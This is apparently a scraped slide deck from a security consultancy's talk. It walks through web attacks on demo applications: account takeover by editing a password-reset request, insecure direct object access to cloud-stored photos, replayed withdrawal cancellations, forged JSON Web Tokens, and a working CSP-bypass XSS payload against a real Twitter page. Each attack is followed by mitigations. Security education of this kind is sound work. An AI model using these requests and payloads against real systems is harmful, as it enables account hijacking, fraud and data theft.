mayaseven s
play

MAYASEVENs Hacking Diary Who are we? Nop Phoomthaisong MAYASEVEN - PowerPoint PPT Presentation

Apr 28, 2023 •1.57k likes •2.36k views

MAYASEVENs Hacking Diary Who are we? Nop Phoomthaisong MAYASEVEN Team Cybersecurity Consultants, The Cybersecurity Expert Guys Cybersecurity Researcher 2 Agenda 1. Account Takeover via Forgot Password Function 2. Amazon S3

  1. MAYASEVEN’s Hacking Diary

  2. Who are we? Nop Phoomthaisong MAYASEVEN Team Cybersecurity Consultants, The Cybersecurity Expert Guys Cybersecurity Researcher 2

  3. Agenda 1. Account Takeover via Forgot Password Function 2. Amazon S3 Misconfiguration 3. Arbitrarily Create Bitcoin on Web Cryptocurrency Exchange 4. Attacking JSON Web Token 5. XSS Triggered by CSP Bypass 6. Adminer Arbitrary File Read 7. Poor Cryptography Implementation 8. Code Obfuscation? 3

  4. MAYASEVEN Cryptocurrency Exchange 4

  5. Account Takeover via Forgot Password Function

  6. Typical Forgot Password Workflow To identify the account owner Confirm Click forgot Insert mobile Received password OTP OTP number Password Enter new changed password 6

  7. Typical Forgot Password Workflow To identify the account owner Confirm Click forgot Insert mobile Received password OTP OTP number Password Enter new changed password 7

  8. Account Takeover via Forgot Password Intercept a request with Burp Suite Web Enter new POST /forgot-password.php HTTP/1.1 Host: 192.168.1.44:8080 server password User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form- urlencoded Content-Length: 77 Connection: close Upgrade-Insecure-Requests: 1 refotp= b097d6 &username= mayaseven &password = mynewpass &confirmpassword= mynewpass 8

  9. Account Takeover via Forgot Password Change username Web Enter new POST /forgot-password.php HTTP/1.1 Host: 192.168.1.44:8080 server password User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form- urlencoded Content-Length: 77 Connection: close Upgrade-Insecure-Requests: 1 refotp= b097d6 &username= mark &password= mynewpass &confirmpassword= mynewpass 9

  10. Account Takeover via Forgot Password Demo ! 10

  11. Lesson Learned • Developers should take care for every stage in workflow 11

  12. Amazon S3 Misconfiguration

  13. Amazon S3 Misconfiguration The web server keeps all photos in Amazon S3 private cloud storage. Redirected to Webapp A photo View Amazon S3 generate photo was show private storage access token Access Token 13

  14. Amazon S3 Misconfiguration Without the Access Token, we cannot access to the photo even when we know the file name. 14

  15. Account takeover via forgot password Is it still vulnerable? 15

  16. Amazon S3 Misconfiguration The web server keeps all photos in Amazon S3 private cloud storage. Redirected to Webapp A photo View Amazon S3 generate photo was show private storage access token Access Token 16

  17. Amazon S3 Misconfiguration Intercept a request with Burp Suite Webapp Redirected to GET /api/s3.php?id_card= id_card_DANIEL.jpg generate Amazon S3 HTTP/1.1 access token private storage Host: 192.168.1.55:8080 User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: close Cookie: id_card_DANIEL.jpg token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJk was show YXRhIjp7InVzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQi OjEsInRlc3QiOiJ0ZXN0In0sImV4cCI6MTU1ODEyM DUwNH0.9iPkFNFlwF4MK5jD39UqUhrQW4fGS2M r62l6j6528kI Upgrade-Insecure-Requests: 1 17

  18. Amazon S3 Misconfiguration Intercept a request with Burp Suite Webapp Redirected to GET /api/s3.php?id_card= id_card_mayaseven.jpg generate Amazon S3 HTTP/1.1 access token private storage Host: 192.168.1.55:8080 User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: close Cookie: id_card_mayaseven.jpg token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJk was show YXRhIjp7InVzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQi OjEsInRlc3QiOiJ0ZXN0In0sImV4cCI6MTU1ODEyM DUwNH0.9iPkFNFlwF4MK5jD39UqUhrQW4fGS2M r62l6j6528kI Upgrade-Insecure-Requests: 1 18

  19. Lesson Learned • A bucket turn off permission to access for "Everyone" (Turn off Object list). • Web application must validate the authorization before generate token to access to the resources. 19

  20. Arbitrarily Create Bitcoin

  21. Arbitrarily Create Bitcoin Cancel a Cryptocurrency Withdraw Balance withdrawal transferred back to deducted cryptocurrency transaction the user’s balance 21

  22. Arbitrarily Create Bitcoin Cancel a Cryptocurrency Withdraw Balance withdrawal transferred back to deducted cryptocurrency transaction the user’s balance 22

  23. Arbitrarily Create Bitcoin Intercept a request with Burp Suite Cancel a GET /transaction.php?cancel_withdraw_transactionid= MjQ= withdrawal Webapp HTTP/1.1 transaction Host: 192.168.1.44:8080 User-Agent: Mozilla/5.0 Accept: */* Accept-Language: en-US,en;q=0.5 Connection: close Cryptocurrency Cookie: transferred back token=eyJ0eXAiOiJqd3QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7In to the user’s VzZXIiOiJtYXlhc2V2ZW4iLCJ1c2VyaWQiOjEsInRlc3QiOiJ0ZXN0I balance n0sImV4cCI6MTU1ODEyMDM5OX0.E_VOI2BCXNFvmgNhWM QWREfXZc49LSWLW80DESzCPgU Upgrade-Insecure-Requests: 1 23

  24. MAYASEVEN 24

  25. Arbitrarily Create Bitcoin Demo ! 25

  26. Lesson Learned • Limit transaction to be canceled only one time. • Transaction ID should be unpredictable. • Check the authorization. 30

  27. Attacking JSON Web Token

  28. Attacking JSON Web Token JSON Web Token (JWT): A compact and self-contained way for securely transmitting information between parties as a JSON object • This information can be verified and trusted because it is digitally signed. • Consist of three parts separated by dots (.), which are Header.Payload.Signature, each part encoded with • base64. example: xxxxx.yyyyy.zzzzz 32

  29. Attacking JSON Web Token Header: The header typically consists of two parts which is JWT and the hashing algorithm. • Then this JSON is Base64 encoded to form the first part of the JWT • 33

  30. Attacking JSON Web Token Payload: Contains statements about an entity and additional metadata. • Then this JSON is Base64 encoded to form the first part of the JWT • 34

  31. Attacking JSON Web Token Signature: Sign the encoded header and payload by using a key and the algorithm specified in the header. • Using defined “ alg ” in the Header part for signing. 35

  32. Attacking JSON Web Token We cannot change any field in JWT because of signature verification, so how to attacks JWT ? 36

  33. Attacking JSON Web Token Three ways for attacking JWT: • Cracking HMAC by using wordlist or Brute Forcing • None Algorithm Attack • Modifying algorithm in the “ alg ” field 37

  34. Attacking JSON Web Token Demo ! 38

  35. Lesson Learned • For HMAC, use strong symmetric key. • Never accept the “none” algorithm. • Use reliable JWT library. 39

  36. XSS Triggered by CSP Bypass

  37. XSS Triggered by CSP Bypass • CSP (Content-Security-Policy) • Header to prevent cross-site scripting (XSS resulting from execution of malicious content in the trusted web page context). content-security-policy: default-src ‘self’ ; connect-src ‘self’ ; font-src ‘self’ https://*.twimg.com https://*.twitter.com data:; frame-src ‘self’ https://twitter.com https://*.twitter.com; script-src ‘self’ https://*. twitter.com; 41

  38. Typical XSS Attacker inject Victim access Website a script to a the webpage webpage JavaScript executed 42

  39. Implement CSP to Protect XSS Attacker inject Website with Victim access a script to a CSP header the webpage webpage JavaScript not executed 43

  40. Implement CSP to Protect XSS So, how to bypass Content Security Policy? 44

  41. How to bypass CSP ? Find input Inject script Find XSS return in with external Script executed entry point response script file Input return in response • Reflection of input arises when data is copied from a request and echoed into • the application's immediate response. 45

  42. XSS Triggered by CSP Bypass Find XSS • XSS on website with CSP entry point https://careers.twitter.com/en/jobs-search.html?location=1 ”onmouseove=“alert(1)” Script could not execute because it was blocked by Content-Security-Policy. 46

  43. Find input XSS Triggered by CSP Bypass return in • Input return in response response Input being returned in the application responses is not a vulnerability in its own right. However, it is a prerequisite for XSS in this case. 47

  44. XSS Triggered by CSP Bypass Inject script with external • Final Payload and URL script file <script src =“ //analytics.twitter.com/tpm?tpm_cb=alert(document.domain)>// ”></script> 48

  45. XSS Triggered by CSP Bypass Demo ! 49

  46. Lesson Learned • Input or output should be sanitized. • Cannot use only CSP to prevent XSS 50

  47. Adminer Arbitrary File Read

  48. Adminer Arbitrary File Read • Adminer • A database management in a single PHP file , which allows the user connecting to any database server. • How to find adminer path? • Dirsearch, wfuzz and etc . 52

  49. Adminer Arbitrary File Read • Create databases and tables. • MySQL command to read the local files on the server 53

  50. Adminer Arbitrary File Read • Create databases and tables. 54

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

10/1/2018 About us Kari Campbe ll Pe g Banks F ounde r, Dog T ire d Doggie Dayc are

10/1/2018 About us Kari Campbe ll Pe g Banks F ounde r, Dog T ire d Doggie Dayc are

10/1/2018 About us Kari Campbe ll Pe g Banks F ounde r, Dog T ire d Doggie Dayc are Dayc are Manage r, Dog T ire d Doggie Dayc are KARI CAMPBE L L Vic e Chair, PACCC Board of Dire c tors CPACO Ce rtifie d Profe

434 views • 6 slides
So on the survey, someone mentioned they wanted to work on heaps, and someone else mentioned they

So on the survey, someone mentioned they wanted to work on heaps, and someone else mentioned they

So on the survey, someone mentioned they wanted to work on heaps, and someone else mentioned they wanted to work on balanced binary search trees. According to the 161 schedule, heaps were last week, hashing is this week, and binary search trees

283 views • 13 slides
Leakage Assessment Methodology - a clear roadmap for side-channel evaluations - 29. August 2015

Leakage Assessment Methodology - a clear roadmap for side-channel evaluations - 29. August 2015

Leakage Assessment Methodology - a clear roadmap for side-channel evaluations - 29. August 2015 Tobias Schneider &amp; Amir Moradi Ruhr-Universitt Bochum Embedded Security Group Outline Motivation Statistical Background Testing

461 views • 43 slides
Applied Statistical Analysis EDUC 6050 Week 6 Finding clarity using data Today 1. Hypothesis

Applied Statistical Analysis EDUC 6050 Week 6 Finding clarity using data Today 1. Hypothesis

Applied Statistical Analysis EDUC 6050 Week 6 Finding clarity using data Today 1. Hypothesis Testing with ANOVA One-Way Two-Way 2 Do you know comparison population mean ! and standard deviation # ? Know comparison population mean

837 views • 44 slides
15% &gt; Black market fueling credential theft Quantifying risk of account takeover Protecting

15% &gt; Black market fueling credential theft Quantifying risk of account takeover Protecting

15% &gt; Black market fueling credential theft Quantifying risk of account takeover Protecting users 1.9B Credentials exposed 12M Estimated credentials **************************************************** Operating System Intel Recovery

1.04k views • 36 slides
Automatic Differentiation for Optimum Design, Applied to Sonic Boom Reduction Laurent Hasco

Automatic Differentiation for Optimum Design, Applied to Sonic Boom Reduction Laurent Hasco

Automatic Differentiation for Optimum Design, Applied to Sonic Boom Reduction Laurent Hasco et, Mariano V azquez, Alain Dervieux Laurent.Hascoet@sophia.inria.fr Tropics Project, INRIA Sophia-Antipolis AD Workshop, Cranfield, June 5-6, 2003

708 views • 42 slides
Faster Con struction of Plan ar 2-Cen ters David Eppstein Dept. In form ation an d Com puter

Faster Con struction of Plan ar 2-Cen ters David Eppstein Dept. In form ation an d Com puter

Faster Con struction of Plan ar 2-Cen ters David Eppstein Dept. In form ation an d Com puter Scien ce Un iv. of Californ ia, Irvin e http:/ / www.ics.uci.edu/ eppstein / 1 The problem Cover n poin ts w/ two m in im um -radius circles 2

227 views • 18 slides
On Gradient Descent and Local vs. Global Optimum We conjecture that both simulating anneal- ing

On Gradient Descent and Local vs. Global Optimum We conjecture that both simulating anneal- ing

On Gradient Descent and Local vs. Global Optimum We conjecture that both simulating anneal- ing and SGD converge to the band of low crit- icial points, and that all criticial points found are local minima of high quality measured by the

368 views • 26 slides
Phase synchronization An example of global optimality on manifolds Nicolas Boumal, Inria &amp;

Phase synchronization An example of global optimality on manifolds Nicolas Boumal, Inria &amp;

Phase synchronization An example of global optimality on manifolds Nicolas Boumal, Inria &amp; ENS Paris Joint work with Afonso Bandeira and Amit Singer One-day workshop on Riemannian and nonsmooth optimization Sept. 25, 2015 Note for the

419 views • 26 slides
Pointwise second-order necessary optimality conditions and sensitivity relations Nonlinear

Pointwise second-order necessary optimality conditions and sensitivity relations Nonlinear

Pointwise second-order necessary optimality conditions and sensitivity relations Nonlinear Partial Differential Equations and Applications Daniel Hoehener MIT joint work with H el` ene Frankowska Paris, June 20, 2016 O PTIMAL C ONTROL P

805 views • 33 slides
Variational optimal power flow and dispatch problems and their approximations Anna Scaglione

Variational optimal power flow and dispatch problems and their approximations Anna Scaglione

Variational optimal power flow and dispatch problems and their approximations Anna Scaglione Anna.Scaglione@asu.edu Arizona State University PSERC Webinar April 18 2107 1 / 42 Motivation Problem: Shortage of ramping resources in the

706 views • 42 slides
Course on Inverse Problems Albert Tarantola Lesson X: Optimization Optimization If the

Course on Inverse Problems Albert Tarantola Lesson X: Optimization Optimization If the

Princeton University Department of Geosciences Course on Inverse Problems Albert Tarantola Lesson X: Optimization Optimization If the volumetric probability f post ( M ) is expected to have a small number of maxima (say one, or two, or

182 views • 7 slides
Image and Video Coding: Encoder Control D D = - R d R Problem Statement / Scope of Image

Image and Video Coding: Encoder Control D D = - R d R Problem Statement / Scope of Image

Image and Video Coding: Encoder Control D D = - R d R Problem Statement / Scope of Image and Video Coding Standards Image and Video Coding input output pre- bitstream post- image/video image/video processing processing encoder

836 views • 35 slides
Introduction to Neural Machine Translation Gongbo Tang 16 September 2019 Outline Why Neural

Introduction to Neural Machine Translation Gongbo Tang 16 September 2019 Outline Why Neural

Introduction to Neural Machine Translation Gongbo Tang 16 September 2019 Outline Why Neural Machine Translation ? 1 Introduction to Neural Networks 2 Neural Language Models 3 Gongbo Tang Introduction to Neural Machine Translation 2/38

686 views • 50 slides
A Formal Model Approach for the Analysis and Validation of the Cooperative Path Planning of a UAV

A Formal Model Approach for the Analysis and Validation of the Cooperative Path Planning of a UAV

A Formal Model Approach for the Analysis and Validation of the Cooperative Path Planning of a UAV Team Antonios Tsourdos Brian White, Rafa bikowski, Peter Silson Suresh Jeyaraman and Madhavan Shanmugavel Guidance &amp; Control Group

826 views • 44 slides
Introduction to Artificial Neural Networks Ahmed Guessoum Natural Language Processing and

Introduction to Artificial Neural Networks Ahmed Guessoum Natural Language Processing and

Introduction to Artificial Neural Networks Ahmed Guessoum Natural Language Processing and Machine Learning Research Group Laboratory for Research in Artificial Intelligence Universit des Sciences et de la Technologie Houari Boumediene 1

1.07k views • 70 slides
Stochastic constrained optimization in Hilbert spaces with applications Georg Ch. Pflug/C.

Stochastic constrained optimization in Hilbert spaces with applications Georg Ch. Pflug/C.

Stochastic constrained optimization in Hilbert spaces with applications Georg Ch. Pflug/C. Geiersbach March 27, 2019 Georg Ch. Pflug/C. Geiersbach Stochastic constrained optimization in Hilbert spaces with applications Iteration methods

589 views • 35 slides
Natural Language Processing with Deep Learning Neural Networks a Walkthrough Navid Rekab-Saz

Natural Language Processing with Deep Learning Neural Networks a Walkthrough Navid Rekab-Saz

Natural Language Processing with Deep Learning Neural Networks a Walkthrough Navid Rekab-Saz navid.rekabsaz@jku.at Institute of Computational Perception Agenda Introduction Non-linearities Forward pass &amp;

670 views • 47 slides
Optimization CMPUT 296: Basics of Machine Learning Textbook 4.1-4.4 Logistics Reminders:

Optimization CMPUT 296: Basics of Machine Learning Textbook 4.1-4.4 Logistics Reminders:

Optimization CMPUT 296: Basics of Machine Learning Textbook 4.1-4.4 Logistics Reminders: Thought Question 1 due TODAY, September 17, by 11:59pm To be handed in via eClass Assignment 1 (due Thursday, September 24 ) Tutorial:

477 views • 18 slides
Target Client &lt;&lt;interface&gt;&gt; Original operationA() operationB() Adapter

Target Client &lt;&lt;interface&gt;&gt; Original operationA() operationB() Adapter

Target Client &lt;&lt;interface&gt;&gt; Original operationA() operationB() Adapter operationA() operationB() Target Client &lt;&lt;interface&gt;&gt; operationA() Adapter Original operationB() original operationA()

320 views • 4 slides
Moving Target Defense for the Placement of Intrusion Detection Systems in the Cloud Sailik

Moving Target Defense for the Placement of Intrusion Detection Systems in the Cloud Sailik

Moving Target Defense for the Placement of Intrusion Detection Systems in the Cloud Sailik Sengupta, Ankur Chowdhary, Subbarao Kambhampati Dijiang Huang SNAC Secure Networking and Yochan AI Lab Computing Lab Intrusion Detection Systems?

681 views • 38 slides
New Evidence for (0 , 2) Target Space Duality He Feng Department of Physics, Virginia Tech based

New Evidence for (0 , 2) Target Space Duality He Feng Department of Physics, Virginia Tech based

New Evidence for (0 , 2) Target Space Duality He Feng Department of Physics, Virginia Tech based on: arXiv:1607.04628[hep-th] Lara B. Anderson and He Feng AMS Special Session - Nov. 13, 2016 He Feng (Virginia Tech) New Evidence for (0 , 2)

819 views • 35 slides
demographics, and outcomes to target support for vulnerable groups Progress to Date:

demographics, and outcomes to target support for vulnerable groups Progress to Date:

Using spatial data on resources, demographics, and outcomes to target support for vulnerable groups Progress to Date: Development of a methodology to track funding ALL-SOURCE towards SDG goals and SDG TRACKING targets -COLOMBIA

284 views • 6 slides
Transgender Youth October 25, 2019 An Pham, MD (pronouns- she/her) Seattle Childrens

Transgender Youth October 25, 2019 An Pham, MD (pronouns- she/her) Seattle Childrens

Transgender Youth October 25, 2019 An Pham, MD (pronouns- she/her) Seattle Childrens Adolescent Medicine Fellow Disclosures No conflict of interest to report. No commercial support or sponsorship, nor is it co- sponsored.

874 views • 26 slides

More recommend